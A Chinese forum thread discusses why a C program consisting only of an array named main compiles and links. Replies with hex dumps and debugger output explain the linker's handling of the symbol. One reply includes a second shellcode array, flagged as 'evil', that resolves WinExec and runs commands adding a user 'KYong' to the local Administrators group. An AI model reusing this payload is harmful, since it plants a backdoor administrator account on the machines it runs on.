编译过程，这个为什么也可以编译？
我先给自己拍砖，代码（如果这可以称为代码)本身固然是垃圾，只是想从编译过程的角度来加深对计算机系统的理解。于是发了这个贴。

不是很清楚为什么这段代码可以作为一个独立的程序被编译：

//main.c
short main[] = {
277, 04735, -4129, 25, 0, 477, 1019, 0xbef, 0, 12800,
-113, 21119, 0x52d7, -1006, -7151, 0, 0x4bc, 020004,
14880, 10541, 2056, 04010, 4548, 3044, -6716, 0x9,
4407, 6, 5568, 1, -30460, 0, 0x9, 5570, 512, -30419,
0x7e82, 0760, 6, 0, 4, 02400, 15, 0, 4, 1280, 4, 0,
4, 0, 0, 0, 0x8, 0, 4, 0, ',', 0, 12, 0, 4, 0, '#',
0, 020, 0, 4, 0, 30, 0, 026, 0, 0x6176, 120, 25712,
'p', 072163, 'r', 29303, 29801, 'e'
};

没有了,没少打。
在vs2005 vs2008 和migw gcc下(devc) 0警告(/W3)，运行报错因为作者是在linux下写的。
这是溢出攻击的典型方式但貌似编译器一开始就只认main符号不分数组和函数，只要有main就先认定有入口点。把main数组改名当然就报错了。
编译器编译出的当前单元的可重定位目标文件main.o时应该还是分数据段和代码段的，debug下应该还包含了部分源代码。
那么就是链接的时候连接器将载入模块(crt0.c...)中对main的引用直接解析为main.o数据段中的main? 然后连接载入运行吗？

xiexie..


[解决办法]
首先，单单的一个数组确实可以编译（语法没错），但一般情况无法连接，这个程序比较特殊，编译为obj的时候这个数组的内容正好在obj中凑成一个main函数，于是连接也没问题
[解决办法]
调试了一下，果然是这样，从map文件看main就是在数据区，把数组的第一个元素设置为oxcccc,(两个int3的机器码），运行后马上就中断了。看来linker果然是只认衣服不认人了。
[解决办法]
编译器把main当成入口点了。然后这个数组中的数据也很特殊，正好能编译通过。
vc6.0不能编译通过，gcc编译成功执行是段错误。
[解决办法]
使用了三种编译器(gcc,vc,bcb),二个平台(win7,linux),研究了一下.
无论是那个编译器,无论是那个平台
编译时main的数据都存在DATA段:(objdump t.obj)
Contents of section .data:
0000 1501dd09 dfef1900 0000dd01 fb03ef0b ................
0010 00000032 8fff7f52 d75212fc 11e40000 ...2...R.R......
0020 bc040420 203a2d29 08080808 c411e40b ... :-)........
0030 c4e50900 37110600 c0150100 04890000 ....7...........
0040 0900c215 00022d89 827ef001 06000000 ......-..~......
0050 04000005 0f000000 04000005 04000000 ................
0060 04000000 00000000 08000000 04000000 ................
0070 2c000000 0c000000 04000000 23000000 ,...........#...
0080 10000000 04000000 1e000000 16000000 ................
0090 76617800 70647000 73747200 77726974 vax.pdp.str.writ
00a0 6500 e.
link后,实际数据仍在DATA段(objdump t.exe)
(我用ollydbg也证实了这点,在403000插入断点时,警告:在数据区...)
Contents of section .data:
403000 1501dd09 dfef1900 0000dd01 fb03ef0b ................
403010 00000032 8fff7f52 d75212fc 11e40000 ...2...R.R......
403020 bc040420 203a2d29 08080808 c411e40b ... :-)........
403030 c4e50900 37110600 c0150100 04890000 ....7...........
403040 0900c215 00022d89 827ef001 06000000 ......-..~......
403050 04000005 0f000000 04000005 04000000 ................
403060 04000000 00000000 08000000 04000000 ................
403070 2c000000 0c000000 04000000 23000000 ,...........#...
403080 10000000 04000000 1e000000 16000000 ................
403090 76617800 70647000 73747200 77726974 vax.pdp.str.writ
4030a0 65000000 ffffffff ffffffff feffffff e...............
只是DATA在windows是有执行权限的,所以可以运行到
00403000 15 01DD09DF ADC EAX,DF09DD01 ;这条指令可以运行
00403005 EF OUT DX,EAX ; 到这里出错,权限不够
以上是window平台
在linux平台下同样main也是在DATA区(objdump t),只是在前面加了些数据
Contents of section .data:
80493c0 00000000 00000000 58950408 00000000 ........X.......
80493d0 00000000 00000000 00000000 00000000 ................
80493e0 1501dd09 dfef1900 0000dd01 fb03ef0b ................
80493f0 00000032 8fff7f52 d75212fc 11e40000 ...2...R.R......
8049400 bc040420 203a2d29 08080808 c411e40b ... :-)........
...
至于运行时,在data段能否运行,还要测试

但也可以肯定的是,无论是linux/window,上面的代码都无法正常执行.因为代码中有直接对i/o的操作且这时的DX是随机的

但这个的确给我们提供了特别的思路,稍改一下,可以去参加IOCCC了

[解决办法]
1.main不是保留字，所以可以定义变量名为main的数组。
2.链接的时候能找到main这个符号。
[解决办法]
其实早期对数据段、代码段没有什么区分，直到486才有这种段保护吧？所以这种代码早年应该可以执行的
[解决办法]
这种 linux 平台下写会简单很多, int80 就是比 int2e 弄的方便....

下面这个可以在 win32 xpsp3 下运行, 并且建立一个 E:\test 的文件, 并写入 Hello World

#ifdef __cplusplus
extern "C"
#endif

const unsigned char main[] = {
0x55,0x8B,0xEC,0x83,0xEC,0x58,0x66,0xC7,0x45,0xA8,0x5C,0x00,0x66,0xC7,0x45,0xAA,
0x3F,0x00,0x66,0xC7,0x45,0xAC,0x3F,0x00,0x66,0xC7,0x45,0xAE,0x5C,0x00,0x66,0xC7,
0x45,0xB0,0x45,0x00,0x66,0xC7,0x45,0xB2,0x3A,0x00,0x66,0xC7,0x45,0xB4,0x5C,0x00,
0x66,0xC7,0x45,0xB6,0x74,0x00,0x66,0xC7,0x45,0xB8,0x65,0x00,0x66,0xC7,0x45,0xBA,
0x73,0x00,0x66,0xC7,0x45,0xBC,0x74,0x00,0x66,0xC7,0x45,0xBE,0x00,0x00,0xC6,0x45,
0xDC,0x48,0xC6,0x45,0xDD,0x65,0xC6,0x45,0xDE,0x6C,0xC6,0x45,0xDF,0x6C,0xC6,0x45,
0xE0,0x6F,0xC6,0x45,0xE1,0x20,0xC6,0x45,0xE2,0x77,0xC6,0x45,0xE3,0x6F,0xC6,0x45,
0xE4,0x72,0xC6,0x45,0xE5,0x6C,0xC6,0x45,0xE6,0x64,0xC6,0x45,0xE7,0x0A,0xC6,0x45,
0xE8,0x00,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xC0,0x18,0x00,0x00,0x00,
0x33,0xC0,0x89,0x45,0xC4,0x89,0x45,0xC8,0x89,0x45,0xCC,0x89,0x45,0xD0,0x89,0x45,
0xD4,0x66,0xC7,0x45,0xF4,0x16,0x00,0x66,0xC7,0x45,0xF6,0x18,0x00,0x8D,0x4D,0xA8,
0x89,0x4D,0xF8,0xC7,0x45,0xCC,0x40,0x00,0x00,0x00,0x8D,0x55,0xF4,0x89,0x55,0xC8,
0x6A,0x00,0x6A,0x00,0x6A,0x20,0x6A,0x03,0x6A,0x07,0x68,0x80,0x00,0x00,0x00,0x6A,
0x00,0x8D,0x45,0xEC,0x50,0x8D,0x4D,0xC0,0x51,0x68,0x00,0x00,0x10,0xC0,0x8D,0x55,
0xFC,0x52,0x6A,0x25,0xE8,0x47,0x00,0x00,0x00,0x83,0xC4,0x30,0x89,0x45,0xD8,0x83,
0x7D,0xD8,0x00,0x7C,0x33,0x6A,0x00,0x6A,0x00,0x6A,0x0C,0x8D,0x45,0xDC,0x50,0x8D,
0x4D,0xEC,0x51,0x6A,0x00,0x6A,0x00,0x6A,0x00,0x8B,0x55,0xFC,0x52,0x68,0x12,0x01,
0x00,0x00,0xE8,0x19,0x00,0x00,0x00,0x83,0xC4,0x28,0x8B,0x45,0xFC,0x50,0x6A,0x19,
0xE8,0x0B,0x00,0x00,0x00,0x83,0xC4,0x08,0x8B,0x45,0xD8,0x8B,0xE5,0x5D,0xC3,0xCC,
0x8B,0x44,0x24,0x04,0x8D,0x54,0x24,0x08,0xCD,0x2E,0xC3,0x90,0x90,0x90,0x90,0x90
};


下面这个是邪恶的好像是开勇发出来的, 一般时候还是不要跑了.....
0x55,0x8b,0xec,0x83,0xec,0x50,0x56,0x57,0x56,0x51,
0x64,0x8b,0x35,0x00,0x00,0x00,0x00,0xad,0x80,0x38,
0xff,0x74,0x04,0x8b,0x00,0xeb,0xf7,0x8b,0x40,0x04,
0x25,0x00,0x00,0xff,0xff,0x66,0x81,0x38,0x4d,0x5a,
0x75,0x0c,0x8b,0x48,0x3c,0x03,0xc8,0x66,0x81,0x39,
0x50,0x45,0x74,0x03,0x48,0xeb,0xe5,0x59,0x5e,0x89,
0x45,0xe4,0x89,0x45,0xbc,0xe8,0x0f,0x00,0x00,0x00,
0x47,0x65,0x74,0x50,0x72,0x6f,0x63,0x41,0x64,0x64,
0x72,0x65,0x73,0x73,0x00,0x58,0x89,0x45,0xc0,0x89,
0x45,0xb0,0xc7,0x45,0xb4,0x0d,0x00,0x00,0x00,0xc7,
0x45,0xf0,0x00,0x00,0x00,0x00,0xe8,0x24,0x01,0x00,
0x00,0x89,0x45,0xd4,0xe8,0x0d,0x00,0x00,0x00,0x4c,
0x6f,0x61,0x64,0x4c,0x69,0x62,0x72,0x61,0x72,0x79,
0x41,0x00,0x58,0x89,0x45,0xc4,0x89,0x45,0xb0,0xc7,
0x45,0xb4,0x0b,0x00,0x00,0x00,0xc7,0x45,0xf0,0x00,
0x00,0x00,0x00,0xe8,0xf5,0x00,0x00,0x00,0x89,0x45,
0xd8,0xe8,0x0d,0x00,0x00,0x00,0x6b,0x65,0x72,0x6e,
0x65,0x6c,0x33,0x32,0x2e,0x64,0x6c,0x6c,0x00,0x8f,
0x45,0xd0,0xe8,0x0c,0x00,0x00,0x00,0x45,0x78,0x69,
0x74,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x00,0x8f,
0x45,0xc8,0xe8,0x08,0x00,0x00,0x00,0x57,0x69,0x6e,
0x45,0x78,0x65,0x63,0x00,0x8f,0x45,0xcc,0x8b,0x45,
0xd0,0x50,0xff,0x55,0xd8,0x89,0x45,0xe4,0xc7,0x45,

0xfc,0x02,0x00,0x00,0x00,0xeb,0x09,0x8b,0x4d,0xfc,
0x83,0xc1,0x01,0x89,0x4d,0xfc,0x83,0x7d,0xfc,0x03,
0x7f,0x18,0x8b,0x55,0xfc,0x8b,0x44,0x95,0xc0,0x50,
0x8b,0x4d,0xe4,0x51,0xff,0x55,0xd4,0x8b,0x55,0xfc,
0x89,0x44,0x95,0xd4,0xeb,0xd9,0xe8,0x1a,0x00,0x00,
0x00,0x6e,0x65,0x74,0x20,0x75,0x73,0x65,0x72,0x20,
0x4b,0x59,0x6f,0x6e,0x67,0x20,0x4b,0x59,0x6f,0x6e,
0x67,0x20,0x2f,0x61,0x64,0x64,0x00,0x8f,0x45,0xe8,
0xe8,0x29,0x00,0x00,0x00,0x6e,0x65,0x74,0x20,0x6c,
0x6f,0x63,0x61,0x6c,0x67,0x72,0x6f,0x75,0x70,0x20,
0x41,0x64,0x6d,0x69,0x6e,0x69,0x73,0x74,0x72,0x61,
0x74,0x6f,0x72,0x73,0x20,0x4b,0x59,0x6f,0x6e,0x67,
0x20,0x2f,0x61,0x64,0x64,0x00,0x8f,0x45,0xec,0xc7,
0x45,0xfc,0x00,0x00,0x00,0x00,0xeb,0x09,0x8b,0x45,
0xfc,0x83,0xc0,0x01,0x89,0x45,0xfc,0x83,0x7d,0xfc,
0x01,0x7f,0x0f,0x6a,0x00,0x8b,0x4d,0xfc,0x8b,0x54,
0x8d,0xe8,0x52,0xff,0x55,0xe0,0xeb,0xe2,0x6a,0x00,
0xff,0x55,0xdc,0x8b,0x45,0xbc,0x83,0xc0,0x3c,0x8b,
0x00,0x03,0x45,0xbc,0x80,0x38,0x50,0x75,0x55,0x89,
0x45,0xb8,0x8b,0x40,0x78,0x03,0x45,0xbc,0x89,0x45,
0xf8,0x8b,0x40,0x20,0x03,0x45,0xbc,0x89,0x45,0xf4,
0x8b,0x4d,0xf8,0x8b,0x49,0x14,0x51,0x8b,0x00,0x03,
0x45,0xbc,0x8b,0x75,0xb0,0x8b,0xf8,0x8b,0x4d,0xb4,
0xfc,0xf3,0xa6,0x75,0x1a,0x83,0xc4,0x04,0x8b,0x45,
0xf8,0x8b,0x40,0x1c,0x03,0x45,0xbc,0xc1,0x65,0xf0,
0x02,0x03,0x45,0xf0,0x8b,0x00,0x03,0x45,0xbc,0xeb,
0x0f,0xff,0x45,0xf0,0x83,0x45,0xf4,0x04,0x8b,0x45,
0xf4,0x59,0xe2,0xc6,0x33,0xc0,0xc3